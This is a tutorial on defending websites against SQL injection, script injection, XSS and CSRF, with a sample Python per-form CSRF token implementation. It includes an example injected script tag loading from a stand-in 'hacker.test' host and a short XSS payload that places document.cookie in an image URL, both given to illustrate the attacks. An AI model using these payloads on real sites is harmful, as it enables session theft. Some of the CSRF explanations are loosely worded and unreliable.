Defense against Common Web Attacks

SQL Injection

Today, most websites are dynamic, for example, CMS websites, transaction websites, and P2P/P2C websites. These websites use languages such as PHP, .Net, Java, ROR, Python, and NodeJS for backend development, and MySQL, Oracle, and SQL Server databases for data storage. SQL injection is a type of attack that is specifically designed to target such websites. Let us examine how SQL injection works.

To defend against SQL injection:

  • Escape every value passed into SQL, and always escape SQL-sensitive characters.
  • Do not build queries by directly concatenating strings.

Script Injection

When you see an unexpected script like <script src="http://hacker.test/hack.js"></script> on your web page, your page has probably suffered a script injection attack. Script injection can be carried out in several ways, such as modifying the web page after obtaining server permissions, injecting scripts through SQL injection, and injecting scripts by exploiting vulnerabilities in page interaction. To make matters worse, bots that scan websites for script injection and SQL injection vulnerabilities are readily available on the internet.

Cross Site Scripting (XSS) attacks

XSS is just one of many script injection attack methods, but it is very popular among attackers because it lets them inject scripts easily. The following is a simple example of an XSS payload:

// Injected script: creates an image element whose URL carries the
// victim's cookie, so the cookie is sent to whatever address the
// attacker puts in front of it (the address is left out here).
var i = document.createElement('img');
i.setAttribute('src', '' + document.cookie);

To defend against XSS:

  1. Always validate parameters, and HTML-escape content submitted on the page.
  2. URL-encode content submitted through the URL.
  3. Add human-machine identification (such as verification codes) at the login and sign-up entry points.

Cross-Site Request Forgery (CSRF)

Many users do not fully understand the differences between CSRF and XSS. Common XSS attacks are specific to a website and work by injecting scripts into it to obtain user information. By comparison, CSRF is more advanced: it needs no injection at all and lets attackers obtain user information directly, without stealing the user's cookie.

  • Ensuring correct usage of GET
    Use GET only for operations that do not change resources, such as viewing, listing, and displaying. Because GET parameters appear in the URL, GET is easy to use but offers poor security, so avoid exposing insecure interfaces through GET.
  • Appending a token to the request address and verifying it later
    In addition to using GET correctly, use non-GET requests (such as POST) to create, modify, and delete resources and to perform other sensitive operations. At the same time, generate a unique token for each user, store it in a cookie or local storage, and append it to POST requests. However, this method is flawed, because XSS can easily read the user's cookie or local storage.
  • Adding a custom HTTP header and verifying it later
    This method also uses tokens for authentication, but instead of appending the token to the request as a parameter it places the token in a custom HTTP header. With the XMLHttpRequest class you can add the csrftoken header, carrying the token value, to every request of that class at once. Because the address requested through XMLHttpRequest is not shown in the browser's address bar, this helps stop the token from leaking to other websites through the Referer.
  • Using pseudo-random numbers for different forms
    Each form carries its own pseudo-random number. Several popular open-source web frameworks, such as Drupal for PHP and Flask for Python, follow this practice. The pseudo-random numbers work as follows:
    1. When the form page is generated, the backend server generates a pseudo-random number, places it in a hidden field of the form, and caches it on the backend.
    2. When the form is submitted, the backend server verifies that the pseudo-random number is correct and still valid, then deletes the cached copy.
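The per-form pseudo-random number scheme from the last bullet, written out as an added example; this is not code from the original article or from Drupal or Flask, and the in-memory dictionary standing in for the backend cache and the session id parameter are assumptions made for the example:

```python
import hmac
import secrets
from typing import Dict, Optional, Set

# Stand-in for the backend cache of issued form tokens, keyed by the
# user's session id. This dict is an assumption for the example; a real
# server would keep it in its session store.
_issued_tokens: Dict[str, Set[str]] = {}


def issue_form_token(session_id: str) -> str:
    """Step 1: when the form page is generated, create a pseudo-random
    number, cache it on the backend and return it for the hidden field."""
    token = secrets.token_urlsafe(32)  # CSPRNG, not the random module
    _issued_tokens.setdefault(session_id, set()).add(token)
    return token


def render_form(session_id: str) -> str:
    """Embed a freshly issued token in a hidden field of the form."""
    token = issue_form_token(session_id)
    return (
        '<form method="post" action="/transfer">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input type="submit" value="Send"></form>'
    )


def verify_form_token(session_id: str, submitted: Optional[str]) -> bool:
    """Step 2: on submit, accept the token only if it was issued to this
    session and has not been used yet, then delete it so a replay fails.
    compare_digest keeps the comparison constant-time."""
    if not submitted:
        return False
    cached = _issued_tokens.get(session_id, set())
    match = next(
        (t for t in cached
         if hmac.compare_digest(t.encode(), submitted.encode())),
        None,
    )
    if match is None:
        return False
    cached.discard(match)  # one-time use: remove the cached copy
    return True
```

A token issued to one session is rejected when submitted under another, and a second submission of the same token fails because the cached copy was deleted on first use.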


In this article, we discussed some of the common web-based attacks that websites and users suffer from, including SQL injections, script injections, XSS attacks, and CSRF. We looked at how each of them works, while also prescribing some steps that can help defend against such attacks.
